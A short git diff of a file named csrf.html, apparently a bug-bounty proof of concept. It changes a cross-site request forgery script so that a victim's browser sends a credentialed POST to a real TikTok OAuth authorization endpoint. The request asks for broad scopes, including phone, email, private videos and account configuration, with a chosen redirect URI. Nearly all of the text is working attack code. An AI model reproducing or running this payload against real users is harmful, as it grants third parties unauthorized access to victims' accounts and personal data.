--- a/csrf.html
+++ b/csrf.html
@@ -6,8 +6,9 @@ function getMe(){
 // retrieve page content
 var xhr = new XMLHttpRequest();
 // now execute the CSRF attack
-xhr.open("GET",
-"https://raw.githubusercontent.com/cancerz1990/h1/main/login.js", true);
+xhr.open("POST",
+"https://www.tiktok.com/passport/open/web/auth/?client_key=aw8cb3204x0a1g88&scope=user.info.basic%2Cuser.info.phone%2Cvideo.list.manage%2Ccomment.list%2Clive.list%2Cvideo.list.private_ads.no_watermark%2Cuser.account.configure%2Cuser.info.showcase%2Cuser.info.email%2Cvideo.list.no_watermark%2Ccomment.list.manage&aid=1459&source=web&redirect_uri=https%3a%2f%2fads.tiktok.com%2fblablablabla&state=64588d019065e001fa8e7abdd884581c10770400
+", true);
 xhr.withCredentials="true";
 
 xhr.setRequestHeader("Content-Type", "application/json");
